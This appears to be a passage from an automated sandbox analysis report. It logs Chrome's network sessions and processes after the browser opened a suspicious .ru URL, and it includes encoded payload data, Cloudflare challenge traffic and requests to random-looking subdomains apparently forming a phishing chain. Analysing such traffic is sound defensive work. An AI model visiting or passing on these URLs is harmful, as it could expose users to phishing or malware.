                                                                                                                                                                                                  2025-01-14 22:38:00 UTC16384OUTData Raw: 67 44 66 45 35 24 53 67 44 54 48 66 32 55 68 63 48 64 31 34 69 34 68 44 58 39 58 44 65 68 44 67 44 66 38 4d 6c 44 72 68 76 57 64 75 44 6d 6c 7a 77 65 49 44 45 7a 67 6c 64 75 44 43 78 65 77 64 4a 44 78 78 67 78 65 6e 44 54 44 58 41 4d 52 44 59 78 46 6c 44 78 44 47 78 73 24 65 6c 44 67 78 4d 57 4d 5a 44 44 78 58 57 64 41 44 2d 78 66 44 4d 62 78 66 78 76 6c 4d 43 44 75 44 68 38 44 6d 51 65 68 55 33 77 53 78 48 44 46 34 38 6c 49 62 78 53 39 65 53 44 48 77 55 6f 64 46 56 39 65 53 73 64 6e 59 31 59 55 44 4d 6c 78 6c 6b 37 38 4d 4c 39 2b 78 46 6e 65 42 79 6f 43 33 34 38 65 44 35 44 6c 44 66 68 44 5a 44 4d 78 65 6c 44 72 68 7a 56 44 77 4d 76 78 7a 77 44 52 49 32 44 46 75 68 62 41 33 44 76 6d 33 68 44 35 44 67 78 36 53 39 38 78 53 68 44 72 44 4d 52 58 78 66 2b 44
                                                                                                                                                                                                  Data Ascii: gDfE5$SgDTHf2UhcHd14i4hDX9XDehDgDf8MlDrhvWduDmlzweIDEzglduDCxewdJDxxgxenDTDXAMRDYxFlDxDGxs$elDgxMWMZDDxXWdAD-xfDMbxfxvlMCDuDh8DmQehU3wSxHDF48lIbxS9eSDHwUodFV9eSsdnY1YUDMlxlk78ML9+xFneByoC348eD5DlDfhDZDMxelDrhzVDwMvxzwDRI2DFuhbA3Dvm3hD5Dgx6S98xShDrDMRXxf+D
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC2101OUTData Raw: 79 65 4a 4b 4c 78 44 6a 44 77 39 56 76 50 32 2b 34 45 36 4b 44 44 56 62 59 78 2d 32 37 37 74 76 44 75 68 2b 44 53 48 4d 75 6e 6f 52 51 6a 66 69 63 74 6b 52 38 4d 62 76 35 38 7a 52 44 37 66 4a 63 45 68 64 30 44 6d 78 44 6c 6e 52 74 65 68 53 6a 4d 7a 6d 4d 6a 77 58 77 30 76 2b 44 65 41 65 65 44 72 68 7a 41 66 62 78 53 34 6c 49 4e 7a 4c 34 7a 44 66 47 64 45 2d 6c 44 52 44 72 78 6c 31 7a 78 65 64 6f 61 54 74 51 24 4a 39 67 72 47 68 64 51 61 55 70 51 37 33 6b 74 4b 41 71 63 76 66 32 53 7a 50 45 44 6e 24 32 39 65 4b 6e 79 39 33 44 53 64 7a 46 24 32 55 50 69 63 51 44 30 61 42 6a 68 59 76 2d 65 79 6b 37 74 58 49 78 68 55 38 56 31 45 45 47 35 66 61 2d 54 6e 51 2d 65 7a 44 5a 61 6e 56 65 75 6f 61 70 71 6a 4d 34 74 51 76 66 65 36 49 53 36 4c 32 70 37 53 45 63 65 75
                                                                                                                                                                                                  Data Ascii: yeJKLxDjDw9VvP2+4E6KDDVbYx-277tvDuh+DSHMunoRQjfictkR8Mbv58zRD7fJcEhd0DmxDlnRtehSjMzmMjwXw0v+DeAeeDrhzAfbxS4lINzL4zDfGdE-lDRDrxl1zxedoaTtQ$J9grGhdQaUpQ73ktKAqcvf2SzPEDn$29eKny93DSdzF$2UPicQD0aBjhYv-eyk7tXIxhU8V1EEG5fa-TnQ-ezDZanVeuoapqjM4tQvfe6IS6L2p7SEceu
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC1347INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:38:00 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 4624
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cf-chl-out: /TZirBkrrAemNz12V2dNFbRfPXlvBKDCkyZW3xJHbGpDjHLwQ9vPrLC08u78e2Y4yFpSJMlItTTD+RzTnZBqCzUi/6y1sbB22kJSUTQnPxw=$8cF5/1Swzn4/QQndPCnvfA==
                                                                                                                                                                                                  cf-chl-out-s: QP2PsVH8QaZnk9uONekGQPR7ZGLE5ufS5HCudo+8d1ZiLe8F4Oa5/Q69ctVwpkaQd79HJTBE/jbCi67wm9sdJU88/0a38NIgEsnitKRx3+3FWcemTevRCv4RuEYHeoTYBhLmq1ZRIeKwxiqNw0EOKeQ06FO/9cixHJgRoRvXHXTQYffF/IyWu5N3QggHQfcJV8F0mbutw0I09mSL138O7LTPV/rW0asakZi3hb9I4vS4OQG1eT9aNqsir29stVK/91+BBCRNoVrjo09XtolYsE14TG6PQZEHqXsj4LB/xpoC6dvrO9uQQEq1UGSFhJhDMqQEspxvNTSVxv6VSIy+ZEamm2JPY3xgHRCTHW67TOgJzylrQNnbaIqf7Zl5I6YGMPfBAbXEwlnqivwyZar6sHnYd8NWDqXsLcb4ikD+VSUVn/m3khR5G48rZVNQnVY55nZ4wI56lSAFQvrs/q2ZF6bTVWcGPdqg3N/qG68ty7nfTlp63v8d/Sit+9g1O0OBudmEI/6G+yJ5kwU0NwNWMWs+HKntMtR0qD3HS/mr4TnDxgJOmxfP3kWhPg8liUQDt5yC51X3VtVwPTzULeLMUoPlok3EzWHIqLVjokjHQQ+Bikaq5NgqWkOGUz4mwBjyvCXugnJcAy09VriiTpXCR1lOUnb4QfLmNU1ygg36hXujmRk1K3vx9cBOIsabIn62PqCfE2oCMZ3PomsKbx0leo6dyDnP9Y2oeQDanKd/pgBXTXdt8tTncp01LkdG6jheGV4mNpm9JLEqnW2yeY+3IrbFYWCFY6dtsbk9IBFm2j628pafxpyZgkQO5GcIZSC15BaADzsv+Ev5OUNNaa2HUoLuJ7qPkirtiyiPgSghVFTIAQaW+rqvf2FFj6lpr4Wx+JXsSgSO1JYigOaxjK2fM4pqKniQDPV1pCl3iT8wrf94af2zc5EPy6g9J7YIWXYXg71RIzdzHAkxBCadhAkfXOGtQ65RY2lXZdHs6eiMW8c=$lwsjy [TRUNCATED]
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 39 30 32 31 31 64 32 33 61 64 31 32 66 35 66 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: CF-RAY: 90211d23ad12f5f7-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC1329INData Raw: 64 4c 71 55 66 38 43 68 71 72 57 35 70 72 4b 7a 74 38 47 4a 71 63 79 32 68 6f 57 36 6f 49 71 4b 76 4c 57 74 77 4d 75 31 7a 4a 75 6d 79 36 71 34 6f 4b 75 76 72 4d 4b 68 35 62 69 2b 32 4f 50 6e 71 38 62 6e 36 36 79 6a 37 4e 75 78 38 72 58 43 31 72 58 31 7a 4e 4c 37 30 66 57 2f 74 39 57 36 7a 41 54 33 43 65 62 46 41 74 7a 6b 31 65 55 49 7a 41 2f 74 43 2f 4c 52 43 75 6a 76 42 39 67 55 35 66 54 59 48 4f 44 75 48 78 4c 2b 41 52 7a 5a 36 50 48 2b 48 65 6b 45 4d 4f 62 74 49 41 76 2b 45 2f 48 32 43 51 38 33 38 44 54 79 4c 42 4d 55 41 52 6b 42 39 51 51 64 47 76 34 6e 42 67 63 64 4a 53 51 34 55 52 30 61 54 68 38 65 51 7a 39 4f 51 69 51 71 46 44 46 66 4b 6c 34 68 4f 54 4a 5a 51 69 55 6c 57 31 55 37 51 56 74 43 59 6c 39 71 53 79 39 45 52 55 30 2b 61 55 6c 43 4d 46 4d
                                                                                                                                                                                                  Data Ascii: dLqUf8ChqrW5prKzt8GJqcy2hoW6oIqKvLWtwMu1zJumy6q4oKuvrMKh5bi+2OPnq8bn66yj7Nux8rXC1rX1zNL70fW/t9W6zAT3CebFAtzk1eUIzA/tC/LRCujvB9gU5fTYHODuHxL+ARzZ6PH+HekEMObtIAv+E/H2CQ838DTyLBMUARkB9QQdGv4nBgcdJSQ4UR0aTh8eQz9OQiQqFDFfKl4hOTJZQiUlW1U7QVtCYl9qSy9ERU0+aUlCMFM
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC1369INData Raw: 6d 46 30 6c 70 35 6b 6f 33 61 6a 66 34 43 4f 6f 4b 57 71 63 35 79 45 6c 59 4f 32 69 34 79 6e 73 72 47 36 72 72 43 52 6b 4a 53 76 72 5a 65 2b 75 63 47 6c 6c 4d 4b 65 6d 4a 33 46 79 4b 76 4b 77 70 43 73 73 63 37 52 32 73 76 53 72 72 50 59 79 4e 75 7a 6d 64 6a 62 6e 75 44 53 33 71 71 6c 33 73 33 4c 70 2b 58 53 71 4c 76 78 73 4f 58 76 36 63 72 59 79 2b 37 4c 33 2f 58 78 2b 76 48 33 2b 73 41 43 42 76 37 62 43 39 37 36 37 4f 7a 6a 42 76 45 49 32 77 49 4d 47 4f 4d 4c 31 64 72 62 43 76 33 59 36 67 6e 79 2f 42 55 58 44 76 67 42 45 76 6a 30 44 41 37 6d 4a 2f 67 6c 41 68 7a 2b 48 53 6f 6a 45 69 48 79 4c 79 67 71 4e 52 67 33 4c 78 4d 44 2b 6a 55 39 4e 7a 4d 38 43 44 73 5a 50 45 51 5a 47 7a 73 38 4a 46 42 48 54 52 42 53 54 68 51 62 46 45 63 74 47 44 46 54 57 6d 4a 63
                                                                                                                                                                                                  Data Ascii: mF0lp5ko3ajf4COoKWqc5yElYO2i4ynsrG6rrCRkJSvrZe+ucGllMKemJ3FyKvKwpCssc7R2svSrrPYyNuzmdjbnuDS3qql3s3Lp+XSqLvxsOXv6crYy+7L3/Xx+vH3+sACBv7bC9767OzjBvEI2wIMGOML1drbCv3Y6gny/BUXDvgBEvj0DA7mJ/glAhz+HSojEiHyLygqNRg3LxMD+jU9NzM8CDsZPEQZGzs8JFBHTRBSThQbFEctGDFTWmJc
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC1369INData Raw: 56 35 6d 70 71 48 6b 61 2b 75 67 34 36 51 6c 62 4e 30 61 37 53 54 63 6d 2b 73 72 33 32 59 6d 63 4f 45 6a 5a 71 58 68 38 65 70 68 4c 32 73 79 71 57 4d 78 36 43 76 31 64 57 78 71 4e 61 6f 74 4b 54 48 71 39 4b 71 6d 5a 36 76 74 4c 71 58 70 4e 2b 6d 77 4b 44 6b 72 4c 58 46 70 71 72 6c 32 37 44 41 30 62 58 70 2b 4e 4c 51 75 2f 6d 36 38 72 58 77 39 76 47 36 37 2b 2f 63 32 76 50 45 33 4f 45 4b 79 67 2f 68 41 63 6f 55 33 52 48 6a 2f 76 49 58 36 66 51 4c 43 76 37 72 48 41 7a 7a 49 2b 73 54 2b 42 50 34 46 69 48 38 44 43 4d 6a 35 2f 6b 76 45 65 2f 7a 49 79 77 66 43 69 77 4f 45 51 59 79 4b 41 30 49 4d 44 63 76 4d 44 34 58 47 66 31 47 4d 7a 63 55 51 77 73 68 49 6a 6c 47 50 67 78 4f 4a 55 49 53 51 6c 51 78 4a 30 38 63 46 78 68 55 51 78 30 75 56 6b 63 30 59 6c 46 66 4b
                                                                                                                                                                                                  Data Ascii: V5mpqHka+ug46QlbN0a7STcm+sr32YmcOEjZqXh8ephL2syqWMx6Cv1dWxqNaotKTHq9KqmZ6vtLqXpN+mwKDkrLXFpqrl27DA0bXp+NLQu/m68rXw9vG67+/c2vPE3OEKyg/hAcoU3RHj/vIX6fQLCv7rHAzzI+sT+BP4FiH8DCMj5/kvEe/zIywfCiwOEQYyKA0IMDcvMD4XGf1GMzcUQwshIjlGPgxOJUISQlQxJ08cFxhUQx0uVkc0YlFfK
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC557INData Raw: 76 69 36 52 78 6b 4a 53 69 69 5a 65 7a 72 59 2b 49 73 4c 61 35 6a 4c 53 33 72 6f 4f 5a 74 34 53 36 73 37 75 49 78 35 69 78 6a 4c 50 49 78 62 58 47 6f 4d 33 52 70 4b 50 47 30 38 2b 6e 7a 64 61 77 74 4e 4b 66 30 65 44 51 78 36 66 42 33 4c 76 4e 75 75 48 62 77 4f 58 71 36 2b 37 4a 34 66 4b 36 38 65 37 4e 39 38 66 72 34 74 54 55 39 4e 62 43 41 67 54 47 30 38 62 74 41 2b 66 48 2f 73 76 6a 42 77 7a 6d 38 4f 30 49 45 39 4c 54 42 2f 48 7a 49 42 6b 41 49 69 49 47 34 41 58 37 4a 79 41 61 49 68 62 38 42 51 4d 63 47 67 4c 38 4a 41 51 55 4f 53 45 78 4b 75 30 6e 44 77 6b 33 50 79 77 59 2b 69 38 5a 2b 50 30 7a 4d 77 74 4e 4e 79 30 59 53 7a 6f 37 51 67 74 53 54 30 67 68 56 6b 4d 56 4b 46 74 49 4d 52 5a 66 53 78 77 6b 59 6c 41 34 5a 6c 51 35 52 6a 68 71 57 45 6f 35 57 30
                                                                                                                                                                                                  Data Ascii: vi6RxkJSiiZezrY+IsLa5jLS3roOZt4S6s7uIx5ixjLPIxbXGoM3RpKPG08+nzdawtNKf0eDQx6fB3LvNuuHbwOXq6+7J4fK68e7N98fr4tTU9NbCAgTG08btA+fH/svjBwzm8O0IE9LTB/HzIBkAIiIG4AX7JyAaIhb8BQMcGgL8JAQUOSExKu0nDwk3PywY+i8Z+P0zMwtNNy0YSzo7QgtST0ghVkMVKFtIMRZfSxwkYlA4ZlQ5RjhqWEo5W0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  24192.168.2.1649740104.21.96.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC661OUTGET /90905003549781675088blDRrUHCFAKJQYHDPRFMEQWIYWIINXLMHIYWOKDVPQHKLW HTTP/1.1
                                                                                                                                                                                                  Host: x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Origin: https://6y.tickarmoz.ru
                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Referer: https://6y.tickarmoz.ru/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:38:01 UTC888INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:38:01 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kj29UG5DQPs1JTrMl%2FJm0c1KEWELbbWt0bcfCbqXtLgHb7KkYcHczaBUmG2F27JrHXzQrKGMyO7YDNfEquHIjwADKgubteoPY%2BkOy70J4%2FpKBRRBSSTTcPTwCikFSYGnueG893kmcmtfg1ubShPqNGAj%2F7xvrnSPdXF0U0r0ViPZE4pnAuUHP7DJX4qxsSBkHjTjSYMK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211d2888f11a48-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1965&rtt_var=745&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1239&delivery_rate=1462193&cwnd=157&unsent_bytes=0&cid=5c74bba6fbc60a1e&ts=605&x=0"
                                                                                                                                                                                                  2025-01-14 22:38:01 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                  Data Ascii: 11
                                                                                                                                                                                                  2025-01-14 22:38:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  25192.168.2.1649739104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:38:01 UTC442INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:38:01 GMT
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Content-Length: 14
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  cf-chl-out: MGds6eeVJkZ/CWM6yqX5f22LfjtrbLm3wL7+zN6Cwc8BjKrYXaB9UBRFGaZjAKTOD8bAXFcLJEn/YW0knWYIZw==$UJ4pPCcNV9zrWoDgOVOXUw==
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211d288aacc35a-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:38:01 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                                                                                                                  Data Ascii: {"err":100230}


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  26192.168.2.1649744104.21.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:38:02 UTC457OUTGET /90905003549781675088blDRrUHCFAKJQYHDPRFMEQWIYWIINXLMHIYWOKDVPQHKLW HTTP/1.1
                                                                                                                                                                                                  Host: x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:38:03 UTC892INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:38:03 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1mnDgZpRnReHOfcVZuFabUHgcmxsCsMOeS6LeyB677D2bu5yilpA1CAG2iiZ0O8tMMWrD%2FN%2F67aFyKjPF6JW3%2BcsUDg1LDSqy1lDj1DchMF9Xkbo0A%2BoOqKcqRWmGzdtzhXjsNwSwXU%2F94iiXAlb2IjYF57eQ0plWG3EdUVTFF3cRZ9xGxviGbjJrC%2BJlQHrJ9AKiXR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211d328e92c443-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1496&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1035&delivery_rate=1891191&cwnd=244&unsent_bytes=0&cid=4a727d3affaf050e&ts=584&x=0"
                                                                                                                                                                                                  2025-01-14 22:38:03 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                  Data Ascii: 11
                                                                                                                                                                                                  2025-01-14 22:38:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                  27192.168.2.164984020.17.11.191443
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:39:13 UTC503OUTGET /apc/trans.gif?5508e97fb6ed28869810ca65ad75bc31 HTTP/1.1
                                                                                                                                                                                                  Origin: https://www.bing.com
                                                                                                                                                                                                  Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Accept-Language: en-CH
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                  Host: afed493c575e33914867d9dfa75363d0.azr.footprintdns.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  2025-01-14 22:39:13 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                  Last-Modified: Tue, 17 Sep 2024 21:36:08 GMT
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  ETag: "3ea699b499db1:0"
                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Access-Control-Expose-Headers: X-UserHostAddress, X-EndPoint, X-FrontEnd, X-MachineName
                                                                                                                                                                                                  X-EndPoint: jhz20prdapp01
                                                                                                                                                                                                  X-MachineName: jhz20app010
                                                                                                                                                                                                  X-UserHostAddress: 8.46.123.0
                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:39:13 GMT
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                  2025-01-14 22:39:13 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                  Data Ascii: GIF89a!,D;


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                  28192.168.2.164984320.17.11.191443
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:39:15 UTC503OUTGET /apc/trans.gif?6a7b1480308df71e1e1813109fa99c95 HTTP/1.1
                                                                                                                                                                                                  Origin: https://www.bing.com
                                                                                                                                                                                                  Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Accept-Language: en-CH
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                  Host: afed493c575e33914867d9dfa75363d0.azr.footprintdns.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  2025-01-14 22:39:15 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                  Last-Modified: Tue, 17 Sep 2024 21:36:08 GMT
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  ETag: "3ea699b499db1:0"
                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Access-Control-Expose-Headers: X-UserHostAddress, X-EndPoint, X-FrontEnd, X-MachineName
                                                                                                                                                                                                  X-EndPoint: jhz20prdapp01
                                                                                                                                                                                                  X-MachineName: jhz20app010
                                                                                                                                                                                                  X-UserHostAddress: 8.46.123.0
                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:39:15 GMT
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                  2025-01-14 22:39:15 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                  Data Ascii: GIF89a!,D;


                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:17:37:43
                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:17:37:44
                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1960,i,12798820108584300126,5385190659516403337,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:17:37:45
                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://6y.tickarmoz.ru/aY57/"
